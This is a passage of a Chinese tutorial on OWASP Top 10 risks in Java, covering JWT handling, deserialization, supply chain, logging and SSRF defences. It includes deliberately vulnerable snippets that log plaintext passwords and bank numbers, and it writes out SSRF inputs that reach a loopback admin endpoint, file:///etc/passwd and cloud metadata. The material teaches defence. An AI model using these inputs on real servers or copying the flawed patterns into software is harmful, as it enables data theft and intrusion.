import io.jsonwebtoken.*; import io.jsonwebtoken.security.Keys; import org.springframework.data.redis.core.RedisTemplate; import java.security.Key; import java.util.Base64; import java.util.Date; import java.util.concurrent.TimeUnit; public class SecureJWTUtil { private final Key secretKey; private static final long ACCESS_TOKEN_EXPIRE_MINUTES = 15; private static final long REFRESH_TOKEN_EXPIRE_DAYS = 7; private static final String TOKEN_BLACKLIST_PREFIX = "token_blacklist:"; private final RedisTemplate<String, String> redisTemplate; private final String issuer = "example.com"; // 密钥从配置中心/KMS获取，禁止硬编码 public SecureJWTUtil(String base64Key, RedisTemplate<String, String> redisTemplate) { byte[] keyBytes = Base64.getDecoder().decode(base64Key); this.secretKey = Keys.hmacShaKeyFor(keyBytes); this.redisTemplate = redisTemplate; } // 生成256位安全密钥，仅用于初始化时使用 public static String generateSecureKey() { Key key = Keys.secretKeyFor(SignatureAlgorithm.HS256); return Base64.getEncoder().encodeToString(key.getEncoded()); } public String generateAccessToken(Long userId) { Date now = new Date(); Date expireDate = new Date(now.getTime() + ACCESS_TOKEN_EXPIRE_MINUTES * 60 * 1000); return Jwts.builder() .setIssuer(issuer) .setSubject(userId.toString()) .setIssuedAt(now) .setExpiration(expireDate) .signWith(secretKey, SignatureAlgorithm.HS256) .compact(); } public String generateRefreshToken(Long userId) { Date now = new Date(); Date expireDate = new Date(now.getTime() + REFRESH_TOKEN_EXPIRE_DAYS * 24 * 60 * 60 * 1000); return Jwts.builder() .setIssuer(issuer) .setSubject(userId.toString()) .setIssuedAt(now) .setExpiration(expireDate) .signWith(secretKey, SignatureAlgorithm.HS256) .compact(); } // 校验token并解析用户ID，严格校验签名、过期时间、签发者 public Long validateTokenAndGetUserId(String token) { // 先校验token是否在黑名单中 if (Boolean.TRUE.equals(redisTemplate.hasKey(TOKEN_BLACKLIST_PREFIX + token))) { throw new ExpiredJwtException(null, null, "token已被吊销"); } try { Jws<Claims> claimsJws = Jwts.parserBuilder() .setSigningKey(secretKey) .requireIssuer(issuer) .build() .parseClaimsJws(token); return Long.valueOf(claimsJws.getBody().getSubject()); } catch (ExpiredJwtException | MalformedJwtException | SignatureException | IllegalArgumentException e) { return null; } } // 退出登录时吊销token，加入黑名单 public void revokeToken(String token) { try { Claims claims = Jwts.parserBuilder() .setSigningKey(secretKey) .build() .parseClaimsJws(token) .getBody(); long expireTime = claims.getExpiration().getTime() - System.currentTimeMillis(); if (expireTime > 0) { redisTemplate.opsForValue().set(TOKEN_BLACKLIST_PREFIX + token, "1", expireTime, TimeUnit.MILLISECONDS); } } catch (Exception e) { // 无效token直接忽略 } } }

2. 身份认证全链路防护规范

密码复杂度强制要求：密码必须包含大小写字母、数字、特殊字符，长度不低于8位，禁止使用常见弱密码
防暴力破解机制：登录接口连续5次失败锁定账号15分钟，同时对IP地址做频率限制，1分钟内最多10次登录请求
会话安全管理：Session ID必须使用高熵随机值，退出登录、修改密码后立即失效会话，设置合理的会话超时时间
多因素认证：核心系统、管理员账号、敏感操作必须开启多因素认证，如短信验证码、谷歌身份验证器
凭证传输安全：所有身份认证相关接口必须使用HTTPS传输，禁止在URL中传递凭证信息

3. 核心防护原则

零信任原则：默认不信任任何请求，每次访问受保护资源都必须校验身份凭证
最小权限原则：仅给用户分配完成业务所需的最小身份权限，默认拒绝所有访问
凭证不可复用：禁止在多个系统使用相同的密钥、密码，定期更换所有身份凭证
全链路校验：身份校验必须在服务端执行，禁止仅在前端做身份校验，所有核心接口必须校验token的有效性

八、软件和数据完整性失效（Software and Data Integrity Failures）

软件和数据完整性失效位列OWASP Top10 2021第八位，是新增的核心风险类别，聚焦于供应链安全、代码和数据的完整性校验，近年来频发的供应链攻击事件，都属于该风险范畴。

底层原理

该风险的核心本质是：应用在代码、依赖、配置、数据的全生命周期中，没有做完整性校验，导致攻击者可以篡改代码、依赖、数据，植入恶意内容，最终在应用或用户端执行。最典型的场景包括供应链攻击、不安全的反序列化、无校验的自动更新、CDN资源劫持等。

漏洞复现

1. 不安全的Java反序列化漏洞

Java反序列化漏洞是最常见的完整性失效风险，当应用反序列化用户可控的不可信数据时，攻击者可以构造恶意序列化对象，执行任意代码，控制服务器。

攻击者可使用ysoserial等工具构造恶意序列化数据，传入该接口，即可执行任意代码，控制服务器。

2. 供应链安全风险示例

<dependencies>  <dependency> <groupId>com.example.fake</groupId> <artifactId>fake-utils</artifactId> <version>1.0.0</version> </dependency> </dependencies>

如果应用配置了非官方的Maven仓库，或引入了未经校验的第三方依赖，可能引入被篡改的恶意组件，造成供应链攻击。

安全校验流程

防护方案

1. 反序列化漏洞的核心防护

绝对禁止反序列化用户可控的不可信数据，这是最根本的防护方案
必须反序列化时，使用安全的序列化方式，如JSON序列化，禁止使用Java原生序列化
若必须使用Java原生序列化，需使用ValidatingObjectInputStream做白名单校验，仅允许反序列化指定的可信类

import org.apache.commons.io.serialization.ValidatingObjectInputStream; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.io.ByteArrayInputStream; import java.util.Base64; @RestController @RequestMapping("/api/data") public class SafeDeserializeController { // 可信类白名单，仅允许反序列化指定的业务类 private static final String[] ALLOWED_CLASSES = { "com.example.entity.User", "com.example.entity.Order" }; @PostMapping("/deserialize") public String deserialize(@RequestBody String base64Data) throws Exception { byte[] data = Base64.getDecoder().decode(base64Data); ByteArrayInputStream bais = new ByteArrayInputStream(data); // 使用ValidatingObjectInputStream做白名单校验 ValidatingObjectInputStream vois = new ValidatingObjectInputStream(bais); for (String clazz : ALLOWED_CLASSES) { vois.accept(clazz); } Object obj = vois.readObject(); vois.close(); bais.close(); return "反序列化成功，对象类型：" + obj.getClass().getName(); } }

2. 供应链安全防护

仅使用官方Maven中央仓库、企业内部可信私有仓库，禁止使用未知的第三方仓库
所有依赖必须校验校验和与数字签名，确保依赖未被篡改
定期扫描依赖的供应链安全风险，使用Snyk、Dependency-Check等工具检测恶意依赖
禁止引入未维护、下载量低、未经安全验证的第三方依赖
建立依赖准入流程，所有新引入的依赖必须经过安全审核

3. 核心防护原则

完整性校验原则：所有代码、依赖、配置、数据，在加载和使用前必须做完整性校验，验证数字签名和哈希值
最小依赖原则：仅引入业务必需的依赖，清理未使用的依赖，缩小攻击面
可信来源原则：仅从官方、可信的来源获取代码、依赖、资源，禁止使用不可信的第三方内容
禁止反序列化不可信数据：永远不要反序列化来自不可信来源的数据，从根源上避免反序列化漏洞

九、安全日志与监控失效（Security Logging and Monitoring Failures）

安全日志与监控失效位列OWASP Top10 2021第九位，是很多企业被入侵后无法及时发现、溯源的核心原因。OWASP数据显示，超过90%的企业存在日志与监控不足的问题，入侵事件的平均发现时间超过200天。

底层原理

该风险的核心本质是：应用没有记录关键的安全事件，或日志内容不完整、不可信，没有建立有效的监控和告警机制，导致安全事件无法被及时发现、分析、溯源和响应，攻击者可以长期潜伏在系统中，造成持续的损害。

常见的风险场景：

未记录登录、权限变更、敏感操作等关键安全事件
日志仅记录成功操作，未记录失败的攻击尝试
日志中缺少关键信息，无法溯源攻击行为
日志仅存储在本地，未做集中管理，服务器被入侵后日志被删除
没有建立有效的监控和告警机制，无法及时发现异常行为
日志中记录了密码、密钥等敏感信息，造成敏感数据泄露

漏洞复现

1. 无效的日志记录示例

2. 日志中记录敏感信息示例

// 漏洞点：日志中记录了用户密码，造成敏感数据泄露 logger.info("用户登录，用户名：{}，密码：{}", dto.getUsername(), dto.getPassword()); // 漏洞点：日志中记录了完整的身份证号、银行卡号，造成敏感数据泄露 logger.info("用户提交实名认证，身份证号：{}，银行卡号：{}", idCard, bankCard);

防护方案

1. 安全的日志记录规范

必须记录的关键安全事件：登录成功/失败、退出登录、密码修改、权限变更、敏感数据访问、敏感操作、异常请求、攻击尝试
日志必须包含的关键字段：事件时间、事件类型、用户ID、客户端IP、请求路径、请求参数（脱敏后）、操作结果、设备信息
绝对禁止在日志中记录密码、密钥、完整身份证号、银行卡号等敏感信息，所有敏感数据必须脱敏后记录
日志必须保证不可篡改，禁止本地存储日志，必须同步到集中式日志系统，如ELK、Splunk

安全的登录日志示例：

import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import javax.servlet.http.HttpServletRequest; @RestController @RequestMapping("/api/auth") public class SafeLogController { private static final Logger logger = LogManager.getLogger(SafeLogController.class); private final UserService userService; private final PasswordEncoder passwordEncoder; public SafeLogController(UserService userService, PasswordEncoder passwordEncoder) { this.userService = userService; this.passwordEncoder = passwordEncoder; } @PostMapping("/login") public String login(@RequestBody UserLoginDTO dto, HttpServletRequest request) { String clientIp = getClientIp(request); String username = dto.getUsername(); User user = userService.findByUsername(username); if (user == null) { logger.warn("登录失败，用户不存在，用户名：{}，客户端IP：{}，请求路径：{}", username, clientIp, request.getRequestURI()); return "用户名或密码错误"; } if (!passwordEncoder.matches(dto.getPassword(), user.getPassword())) { logger.warn("登录失败，密码错误，用户ID：{}，用户名：{}，客户端IP：{}，请求路径：{}", user.getId(), username, clientIp, request.getRequestURI()); return "用户名或密码错误"; } logger.info("登录成功，用户ID：{}，用户名：{}，客户端IP：{}，请求路径：{}", user.getId(), username, clientIp, request.getRequestURI()); return "登录成功"; } private String getClientIp(HttpServletRequest request) { String ip = request.getHeader("X-Forwarded-For"); if (ip == null || ip.isEmpty() || "unknown".equalsIgnoreCase(ip)) { ip = request.getHeader("Proxy-Client-IP"); } if (ip == null || ip.isEmpty() || "unknown".equalsIgnoreCase(ip)) { ip = request.getHeader("WL-Proxy-Client-IP"); } if (ip == null || ip.isEmpty() || "unknown".equalsIgnoreCase(ip)) { ip = request.getRemoteAddr(); } return ip.split(",")[0].trim(); } }

2. 安全监控与告警机制

建立实时监控体系，对关键安全事件进行实时监控，及时发现异常行为
必须配置的核心告警规则：短时间内多次登录失败、异地登录、非工作时间敏感操作、权限异常变更、高频异常请求、接口访问异常
告警必须分级，不同级别的告警采用不同的通知方式，如短信、电话、邮件、企业微信通知
建立安全事件响应流程，告警触发后必须有专人负责处理、分析、闭环
定期对日志进行审计，分析潜在的安全风险，优化防护策略

3. 核心防护原则

全量记录原则：所有关键安全事件必须完整记录，不能遗漏，确保攻击行为可溯源
日志不可篡改原则：日志必须集中存储，保证不可篡改、不可删除，即使服务器被入侵，日志依然完整
敏感信息脱敏原则：日志中所有敏感信息必须脱敏，禁止记录明文敏感数据
实时监控原则：建立实时监控和告警机制，确保安全事件可及时发现、及时响应

十、服务端请求伪造（Server-Side Request Forgery, SSRF）

服务端请求伪造位列OWASP Top10 2021第十位，是近年来云原生、微服务架构下最受关注的安全风险，随着云服务的普及，SSRF漏洞的危害越来越大。

底层原理

SSRF的核心本质是：攻击者利用服务端的接口，构造恶意请求，让服务端代替攻击者发起请求，访问或攻击服务端内网的资源。因为请求是从受信任的服务端发起的，可以绕过防火墙、访问控制等防护措施，扫描内网端口、攻击内网服务、读取本地文件，甚至执行代码。

常见的风险场景：

图片加载、文件下载接口，用户传入URL，服务端直接发起请求获取资源
第三方接口调用、webhook回调接口，用户传入回调地址，服务端直接请求
云服务元数据接口访问，攻击者通过SSRF获取云服务器的AK/SK，控制整个云资源
内网服务扫描，攻击者通过SSRF探测内网存活的服务和端口，寻找可利用的漏洞

漏洞复现

攻击者传入http://127.0.0.1:8080/api/admin/users，即可让服务端访问本地的管理员接口，获取全量用户数据；传入file:///etc/passwd，可读取服务器本地文件；传入云服务元数据地址，可获取云服务器的AK/SK，控制整个云资源。

SSRF攻击流程

防护方案

1. 根本防护原则

禁止直接使用用户传入的URL发起请求，优先使用白名单模式，仅允许访问预设的可信域名和地址
必须使用用户传入的URL时，必须做严格的校验，禁止访问内网、本地地址，禁止使用file、gopher、ftp等危险协议
禁用不必要的协议，仅允许http和https协议
对请求的响应做严格的限制，禁止返回敏感内容，限制响应大小

2. 安全的资源获取实现

import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; import java.io.InputStream; import java.net.*; import java.util.Arrays; import java.util.List; @RestController @RequestMapping("/api/resource") public class SafeSSRFController { // 可信域名白名单，仅允许访问白名单内的域名 private static final List<String> ALLOWED_DOMAINS = Arrays.asList( "example.com", "cdn.example.com" ); // 禁止访问的内网网段 private static final List<String> FORBIDDEN_NETWORKS = Arrays.asList( "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10" ); @GetMapping("/fetch") public String fetchResource(@RequestParam String url) throws Exception { URL targetUrl; try { targetUrl = new URL(url); } catch (MalformedURLException e) { throw new IllegalArgumentException("非法的URL格式"); } // 1. 仅允许http和https协议，禁止其他危险协议 String protocol = targetUrl.getProtocol(); if (!"http".equals(protocol) && !"https".equals(protocol)) { throw new IllegalArgumentException("仅允许http和https协议"); } // 2. 校验域名是否在白名单内 String host = targetUrl.getHost(); boolean isDomainAllowed = ALLOWED_DOMAINS.stream().anyMatch(allowedDomain -> host.endsWith("." + allowedDomain) || host.equals(allowedDomain)); if (!isDomainAllowed) { throw new IllegalArgumentException("不允许访问的域名"); } // 3. 解析IP地址，禁止访问内网IP InetAddress address = InetAddress.getByName(host); if (isForbiddenIp(address)) { throw new IllegalArgumentException("不允许访问的IP地址"); } // 4. 限制端口，仅允许80和443端口 int port = targetUrl.getPort() == -1 ? targetUrl.getDefaultPort() : targetUrl.getPort(); if (port != 80 && port != 443) { throw new IllegalArgumentException("仅允许访问80和443端口"); } // 5. 发起请求，设置超时时间，防止SSRF作为端口扫描工具 URLConnection connection = targetUrl.openConnection(); connection.setConnectTimeout(5000); connection.setReadTimeout(5000); connection.setDoInput(true); connection.setDoOutput(false); // 6. 限制响应大小，防止大文件攻击 int maxSize = 1024 * 1024; // 最大1MB try (InputStream is = connection.getInputStream()) { byte[] buffer = new byte[1024]; int len; int totalSize = 0; StringBuilder result = new StringBuilder(); while ((len = is.read(buffer)) != -1) { totalSize += len; if (totalSize > maxSize) { throw new IllegalArgumentException("响应内容超出大小限制"); } result.append(new String(buffer, 0, len)); } return result.toString(); } } private boolean isForbiddenIp(InetAddress address) { if (address.isLoopbackAddress() || address.isSiteLocalAddress() || address.isLinkLocalAddress() || address.isAnyLocalAddress()) { return true; } for (String cidr : FORBIDDEN_NETWORKS) { if (isIpInCidr(address, cidr)) { return true; } } return false; } private boolean isIpInCidr(InetAddress address, String cidr) { String[] parts = cidr.split("/"); String ipAddress = parts[0]; int prefix = Integer.parseInt(parts[1]); try { InetAddress cidrAddress = InetAddress.getByName(ipAddress); byte[] addressBytes = address.getAddress(); byte[] cidrBytes = cidrAddress.getAddress(); if (addressBytes.length != cidrBytes.length) { return false; } int fullBytes = prefix / 8; int remainderBits = prefix % 8; for (int i = 0; i < fullBytes; i++) { if (addressBytes[i] != cidrBytes[i]) { return false; } } if (remainderBits > 0) { int mask = 0xFF << (8 - remainderBits); if ((addressBytes[fullBytes] & mask) != (cidrBytes[fullBytes] & mask)) { return false; } } return true; } catch (Exception e) { return false; } } }

3. 核心防护原则

白名单优先原则：优先使用域名白名单，仅允许访问可信的域名和地址，这是最有效的SSRF防护方案
协议限制原则：仅允许http和https协议，禁止所有其他危险协议
内网禁止原则：禁止访问内网、本地、回环地址，防止内网探测和攻击
最小权限原则：发起请求的服务账号仅分配最小权限，禁止访问云服务元数据接口，降低SSRF漏洞的危害
超时限制原则：设置合理的连接和读取超时时间，防止SSRF被用作端口扫描工具

总结

Java应用安全是一个全链路、全生命周期的体系，没有绝对的安全，只有持续的防护。OWASP Top10覆盖了Java Web应用90%以上的安全风险，掌握每类风险的底层原理、攻击方式和防护方案，是每一位Java开发者必备的能力。

安全不是一次性的工作，而是持续的过程。开发者需要在需求、设计、开发、测试、上线、运维的全流程中融入安全思维，建立安全开发规范，定期开展安全培训和漏洞扫描，及时修复安全风险，才能真正筑牢Java应用的安全防线，避免因为安全漏洞造成不可挽回的损失。

探索云世界

热门

云计算

大数据

云原生

人工智能

数据库

开发与运维

活动广场

任务中心

训练营

直播

乘风者计划

下载

镜像站

技术资料

别让你的 Java 应用裸奔！OWASP Top10 全漏洞原理、复现与一站式防护方案

一、失效的访问控制（Broken Access Control）

底层原理

漏洞复现

1. 水平越权漏洞示例

2. 垂直越权漏洞示例

漏洞触发流程

防护方案

1. 服务端强制权限校验

2. 基于RBAC的统一权限控制

3. 核心防护原则

二、加密机制失效（Cryptographic Failures）

底层原理

漏洞复现

1. 不安全的密码存储示例

2. 不安全的对称加密示例

防护方案

1. 密码存储的正确实践

2. 对称加密的正确实践

3. 核心防护原则

三、注入攻击（Injection）

底层原理

漏洞复现

1. SQL注入漏洞示例

2. 命令注入漏洞示例

漏洞触发与防护流程

防护方案

1. SQL注入的核心防护

2. 命令注入的核心防护

3. 核心防护原则

四、不安全的设计（Insecure Design）

底层原理

漏洞复现

安全的业务流程设计

防护方案

1. 安全的密码找回流程实现

2. 核心防护原则

五、安全配置错误（Security Misconfiguration）

底层原理

漏洞复现

1. Spring Boot Actuator端点对外暴露

2. 不安全的跨域配置

防护方案

1. 最小化配置原则

2. 安全的跨域配置

3. 关闭错误页面的详细堆栈信息

4. 配置HTTP安全响应头

5. 核心防护原则

六、自带缺陷和过时的组件（Vulnerable and Outdated Components）

底层原理

漏洞复现

防护方案

七、身份认证和授权失效（Identification and Authentication Failures）

底层原理

漏洞复现

防护方案

1. 安全的JWT实现

2. 身份认证全链路防护规范

3. 核心防护原则

八、软件和数据完整性失效（Software and Data Integrity Failures）

底层原理

漏洞复现

1. 不安全的Java反序列化漏洞

2. 供应链安全风险示例